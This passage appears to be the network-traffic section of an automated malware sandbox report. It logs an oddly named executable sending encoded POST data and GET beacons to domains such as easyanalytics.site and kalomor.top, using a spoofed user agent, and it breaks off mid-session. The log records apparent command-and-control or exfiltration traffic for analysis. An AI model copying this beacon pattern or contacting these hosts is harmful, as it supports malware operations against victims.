                      Sep 13, 2024 12:29:06.625754118 CEST567INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                      Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiOTE2MDZmMjctMzY3ZC00YTA2LTk4MjAtNGNkOWIwNjgwNTEyIiwicGFnZV90aW1lIjoxNzI2MjIzMz


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      24192.168.2.450425199.59.243.226803120C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe
                      TimestampBytes transferredDirectionData
                      Sep 13, 2024 12:29:08.675864935 CEST482OUTGET /m409/?MtXH8dRH=vgT3vdiL6XmHyQpuqznGmu4w6V9vwAtJ/QiZ74rQqCLiqTobayGplqDkxFD969c96YoECNzKpiIWNF3RdO36GE5+Hjm0BUXOD0JGo2GVPeYBG+tw9V1xstM=&EB04T=0hSTF8phw HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Host: www.dom-2.online
                      Connection: close
                      User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                      Sep 13, 2024 12:29:09.136223078 CEST1236INHTTP/1.1 200 OK
                      date: Fri, 13 Sep 2024 10:29:08 GMT
                      content-type: text/html; charset=utf-8
                      content-length: 1466
                      x-request-id: 185ac257-4d2f-4180-9c07-f4ee179decac
                      cache-control: no-store, max-age=0
                      accept-ch: sec-ch-prefers-color-scheme
                      critical-ch: sec-ch-prefers-color-scheme
                      vary: sec-ch-prefers-color-scheme
                      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_tlTFSKQnvFrupX7Iw0xonjcPEimuv4JY8Sd1MbUieALKOH/WxGWFz3ABg32Q5o/cIFfb9ijhgPcKzZTxw9L3KQ==
                      set-cookie: parking_session=185ac257-4d2f-4180-9c07-f4ee179decac; expires=Fri, 13 Sep 2024 10:44:09 GMT; path=/
                      connection: close
                      Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 74 6c 54 46 53 4b 51 6e 76 46 72 75 70 58 37 49 77 30 78 6f 6e 6a 63 50 45 69 6d 75 76 34 4a 59 38 53 64 31 4d 62 55 69 65 41 4c 4b 4f 48 2f 57 78 47 57 46 7a 33 41 42 67 33 32 51 35 6f 2f 63 49 46 66 62 39 69 6a 68 67 50 63 4b 7a 5a 54 78 77 39 4c 33 4b 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                      Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_tlTFSKQnvFrupX7Iw0xonjcPEimuv4JY8Sd1MbUieALKOH/WxGWFz3ABg32Q5o/cIFfb9ijhgPcKzZTxw9L3KQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                      Sep 13, 2024 12:29:09.136499882 CEST919INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                      Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMTg1YWMyNTctNGQyZi00MTgwLTljMDctZjRlZTE3OWRlY2FjIiwicGFnZV90aW1lIjoxNzI2MjIzMz


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      25192.168.2.450426162.241.226.190803120C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe
                      TimestampBytes transferredDirectionData
                      Sep 13, 2024 12:29:14.322768927 CEST760OUTPOST /21tc/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate
                      Host: www.easyanalytics.site
                      Origin: http://www.easyanalytics.site
                      Content-Length: 205
                      Content-Type: application/x-www-form-urlencoded
                      Cache-Control: no-cache
                      Connection: close
                      Referer: http://www.easyanalytics.site/21tc/
                      User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                      Data Raw: 4d 74 58 48 38 64 52 48 3d 51 62 46 42 4e 55 68 47 6f 39 2f 6e 57 64 50 78 47 52 48 7a 65 5a 5a 32 4c 77 32 6b 6c 61 6b 6d 33 64 70 31 30 46 62 73 6e 71 2f 44 77 4c 42 57 6c 4a 44 63 4e 39 5a 61 57 66 79 7a 77 4a 47 42 6f 30 68 39 52 2b 79 44 31 71 4b 41 72 30 71 6c 58 53 48 4a 32 6c 71 64 55 32 75 4c 4b 47 79 66 79 65 44 6e 63 49 72 34 33 79 35 2f 5a 45 2f 54 67 59 2f 32 32 46 63 33 76 62 71 66 4d 38 4d 33 33 34 44 33 59 43 4a 6f 4a 75 39 31 4b 36 63 67 62 5a 78 79 75 69 32 50 57 38 30 59 56 77 74 53 31 4d 31 30 56 56 69 51 7a 34 34 45 6b 43 66 48 34 39 74 43 58 5a 4d 65 54 63 59 71 67 63 62 4d 75 41 3d 3d
                      Data Ascii: MtXH8dRH=QbFBNUhGo9/nWdPxGRHzeZZ2Lw2klakm3dp10Fbsnq/DwLBWlJDcN9ZaWfyzwJGBo0h9R+yD1qKAr0qlXSHJ2lqdU2uLKGyfyeDncIr43y5/ZE/TgY/22Fc3vbqfM8M334D3YCJoJu91K6cgbZxyui2PW80YVwtS1M10VViQz44EkCfH49tCXZMeTcYqgcbMuA==
                      Sep 13, 2024 12:29:14.920083046 CEST479INHTTP/1.1 404 Not Found
                      Date: Fri, 13 Sep 2024 10:29:14 GMT
                      Server: Apache
                      Content-Length: 315
                      Connection: close
                      Content-Type: text/html; charset=iso-8859-1
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      26192.168.2.450427162.241.226.190803120C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe
                      TimestampBytes transferredDirectionData
                      Sep 13, 2024 12:29:16.876532078 CEST780OUTPOST /21tc/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate
                      Host: www.easyanalytics.site
                      Origin: http://www.easyanalytics.site
                      Content-Length: 225
                      Content-Type: application/x-www-form-urlencoded
                      Cache-Control: no-cache
                      Connection: close
                      Referer: http://www.easyanalytics.site/21tc/
                      User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                      Data Raw: 4d 74 58 48 38 64 52 48 3d 51 62 46 42 4e 55 68 47 6f 39 2f 6e 58 39 2f 78 48 79 66 7a 59 35 5a 70 58 67 32 6b 2f 71 6b 69 33 64 6c 31 30 47 58 38 6e 5a 62 44 78 72 78 57 6d 4c 72 63 4b 39 5a 61 5a 2f 79 32 30 4a 47 30 6f 30 6c 44 52 37 4b 44 31 71 65 41 72 78 57 6c 58 67 76 57 33 31 71 6c 4d 47 75 4a 55 32 79 66 79 65 44 6e 63 4d 44 47 33 7a 64 2f 5a 31 76 54 76 64 4c 31 71 31 63 34 73 62 71 66 49 38 4d 4e 33 34 44 42 59 43 34 2f 4a 74 46 31 4b 37 73 67 61 49 78 78 35 53 32 46 4c 73 31 55 52 79 30 5a 73 50 41 48 52 58 4f 77 7a 71 38 49 73 6b 4f 64 70 4d 4d 56 46 5a 6f 74 4f 62 52 65 74 66 6d 46 31 44 70 41 2f 31 4e 42 59 59 53 6b 4e 48 57 49 6d 63 47 6c 59 59 63 3d
                      Data Ascii: MtXH8dRH=QbFBNUhGo9/nX9/xHyfzY5ZpXg2k/qki3dl10GX8nZbDxrxWmLrcK9ZaZ/y20JG0o0lDR7KD1qeArxWlXgvW31qlMGuJU2yfyeDncMDG3zd/Z1vTvdL1q1c4sbqfI8MN34DBYC4/JtF1K7sgaIxx5S2FLs1URy0ZsPAHRXOwzq8IskOdpMMVFZotObRetfmF1DpA/1NBYYSkNHWImcGlYYc=
                      Sep 13, 2024 12:29:17.468024015 CEST479INHTTP/1.1 404 Not Found
                      Date: Fri, 13 Sep 2024 10:29:17 GMT
                      Server: Apache
                      Content-Length: 315
                      Connection: close
                      Content-Type: text/html; charset=iso-8859-1
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      27192.168.2.450428162.241.226.190803120C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe
                      TimestampBytes transferredDirectionData
                      Sep 13, 2024 12:29:19.425220013 CEST10862OUTPOST /21tc/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate
                      Host: www.easyanalytics.site
                      Origin: http://www.easyanalytics.site
                      Content-Length: 10305
                      Content-Type: application/x-www-form-urlencoded
                      Cache-Control: no-cache
                      Connection: close
                      Referer: http://www.easyanalytics.site/21tc/
                      User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                      Data Raw: 4d 74 58 48 38 64 52 48 3d 51 62 46 42 4e 55 68 47 6f 39 2f 6e 58 39 2f 78 48 79 66 7a 59 35 5a 70 58 67 32 6b 2f 71 6b 69 33 64 6c 31 30 47 58 38 6e 5a 54 44 78 59 35 57 68 61 72 63 4c 39 5a 61 55 66 79 33 30 4a 47 70 6f 30 64 48 52 36 33 30 31 6f 6d 41 6f 55 61 6c 52 55 37 57 75 46 71 6c 46 6d 75 55 4b 47 7a 4c 79 66 7a 37 63 49 66 47 33 7a 64 2f 5a 32 48 54 72 49 2f 31 6f 31 63 33 76 62 71 54 4d 38 4e 44 33 34 4c 2f 59 44 4e 43 4a 63 6c 31 4e 62 38 67 63 36 70 78 6c 43 32 44 4b 73 30 4a 52 79 49 57 73 50 64 38 52 54 4f 57 7a 6f 67 49 70 31 2f 47 38 66 73 6f 47 4a 38 42 55 62 46 74 6b 76 57 6e 30 7a 45 30 2b 48 39 69 61 4c 6e 4e 4b 6c 72 61 38 38 57 43 46 50 66 4b 4a 32 4a 6f 67 70 42 37 39 59 79 71 52 52 72 64 51 6b 6a 2b 71 46 37 4e 52 37 4f 6f 6f 50 5a 66 4b 36 71 2b 34 39 4f 70 75 72 46 63 50 47 32 65 79 47 61 4d 45 70 6f 75 2f 36 49 55 5a 74 69 4c 79 6d 61 79 6d 2b 49 35 76 65 6c 54 79 69 47 58 35 47 4a 46 37 37 52 38 73 79 5a 72 58 66 6a 34 2f 62 50 79 45 46 61 6b 48 78 2f 51 78 33 55 63 37 [TRUNCATED]
                      Data Ascii: MtXH8dRH=QbFBNUhGo9/nX9/xHyfzY5ZpXg2k/qki3dl10GX8nZTDxY5WharcL9ZaUfy30JGpo0dHR6301omAoUalRU7WuFqlFmuUKGzLyfz7cIfG3zd/Z2HTrI/1o1c3vbqTM8ND34L/YDNCJcl1Nb8gc6pxlC2DKs0JRyIWsPd8RTOWzogIp1/G8fsoGJ8BUbFtkvWn0zE0+H9iaLnNKlra88WCFPfKJ2JogpB79YyqRRrdQkj+qF7NR7OooPZfK6q+49OpurFcPG2eyGaMEpou/6IUZtiLymaym+I5velTyiGX5GJF77R8syZrXfj4/bPyEFakHx/Qx3Uc73neMB0EZZZ246aViqmjz8o1peJZngac0Lwa99kP0xJtCO1+sgJXl7BfPol1ep686HJzajoBscCsT6Iy9Udolg7YRBG9VeVHlXcYTcmfLz1BTX3lFN5bc/lq03V0pdqlAWIzbnrkNPLHGB/8tUUOjoYW6lG0Him9bEPS2PqV2ZIWLiijbgQ3WbXJ9h3OCT9J7AQO1KCtNjgRKF3ljBa0nUFDgHnUa9uOJOa/X9kWvTtVFu9RUiBaD4Sj2aSXxfb3VRgCkn5Z/tKHMksQ3vStjzinZUFS8+dpr2lqoWuoSM79uIRWu57Xwnfn33CZfOIkVmrOMwzzu/3x5TiVPXWI6mXMgrU3XkncAoplOOzkHmzGyR2mA4hEQb8lXmYkGIGhQm5yzEk+M9LT/FRy/rz0GrfdoN0/HIYK1LxDl+LvL3tidbCxInerS0Y/XF4u1kpwoEcVYXdx3opaQ8h+ZG0rOu0imGUME7XF2ogsTogvDZU1PX0OmZnFsTVv0r2NoidULPtxvsArLb7zu4+8USY76Ad540+Y8NgEPL04v6cANyIs3N2DHWLYvY1aTPRV873zogaCdAuhtaKWJC5Z7BoXGK+lyJ3o+FtANIi6N62iKf81m/0liPVWz7Ehz/95zLAqM91EONa5zII3RRuxVySglAIzvDKMFevgKHg [TRUNCATED]
                      Sep 13, 2024 12:29:20.079303980 CEST479INHTTP/1.1 404 Not Found
                      Date: Fri, 13 Sep 2024 10:29:19 GMT
                      Server: Apache
                      Content-Length: 315
                      Connection: close
                      Content-Type: text/html; charset=iso-8859-1
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      28192.168.2.450429162.241.226.190803120C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe
                      TimestampBytes transferredDirectionData
                      Sep 13, 2024 12:29:22.274085999 CEST488OUTGET /21tc/?MtXH8dRH=dZthOjk/1dPqZuqAGh/VZ5JieneFrO0O+sFz5UfhqKDq1IpY9KHnH85jTOrt8bOMtDp+Wqm6lvqy9EKuTgvz+0mfPUCSMg+fwe3gbMHC32F4Yn2Fr4fx3Q4=&EB04T=0hSTF8phw HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Host: www.easyanalytics.site
                      Connection: close
                      User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                      Sep 13, 2024 12:29:22.922122002 CEST479INHTTP/1.1 404 Not Found
                      Date: Fri, 13 Sep 2024 10:29:22 GMT
                      Server: Apache
                      Content-Length: 315
                      Connection: close
                      Content-Type: text/html; charset=iso-8859-1
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      29192.168.2.45043091.215.85.23803120C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe
                      TimestampBytes transferredDirectionData
                      Sep 13, 2024 12:29:29.077130079 CEST739OUTPOST /1i25/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate
                      Host: www.kalomor.top
                      Origin: http://www.kalomor.top
                      Content-Length: 205
                      Content-Type: application/x-www-form-urlencoded
                      Cache-Control: no-cache
                      Connection: close
                      Referer: http://www.kalomor.top/1i25/
                      User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                      Data Raw: 4d 74 58 48 38 64 52 48 3d 73 74 41 76 66 30 46 54 56 6b 63 6f 74 68 5a 59 75 52 65 53 6d 69 61 6d 59 6e 49 58 47 43 71 69 78 72 6a 4a 4d 53 32 4d 74 68 47 42 76 31 30 38 31 51 43 43 57 65 4a 30 68 75 65 37 30 66 66 47 44 4a 58 6b 76 65 74 6a 66 31 73 65 4b 77 46 57 43 48 46 45 42 6e 72 57 6e 73 77 32 76 4b 73 68 37 76 4e 78 74 6f 56 43 5a 56 73 4c 6e 67 4b 34 30 66 67 68 6a 72 35 68 54 70 67 6c 67 39 50 4b 69 59 67 50 33 70 42 70 56 4f 77 2b 63 47 6b 75 33 46 48 57 6b 76 2f 72 6a 72 35 55 34 34 48 4f 63 31 65 67 67 7a 70 31 51 6f 43 79 33 6d 4b 6b 2b 50 2f 31 43 6c 34 35 54 30 6e 38 58 37 72 6f 45 51 3d 3d
                      Data Ascii: MtXH8dRH=stAvf0FTVkcothZYuReSmiamYnIXGCqixrjJMS2MthGBv1081QCCWeJ0hue70ffGDJXkvetjf1seKwFWCHFEBnrWnsw2vKsh7vNxtoVCZVsLngK40fghjr5hTpglg9PKiYgP3pBpVOw+cGku3FHWkv/rjr5U44HOc1eggzp1QoCy3mKk+P/1Cl45T0n8X7roEQ==
                      Sep 13, 2024 12:29:29.797451019 CEST309INHTTP/1.1 405 Not Allowed
                      Server: nginx/1.26.2
                      Date: Fri, 13 Sep 2024 10:29:29 GMT
                      Content-Type: text/html
                      Content-Length: 157
                      Connection: close
                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.26.2</center></body></html>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      30192.168.2.45043191.215.85.23803120C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe
                      TimestampBytes transferredDirectionData
                      Sep 13, 2024 12:29:31.621857882 CEST759OUTPOST /1i25/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate
                      Host: www.kalomor.top
                      Origin: http://www.kalomor.top
                      Content-Length: 225
                      Content-Type: application/x-www-form-urlencoded
                      Cache-Control: no-cache
                      Connection: close
                      Referer: http://www.kalomor.top/1i25/
                      User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
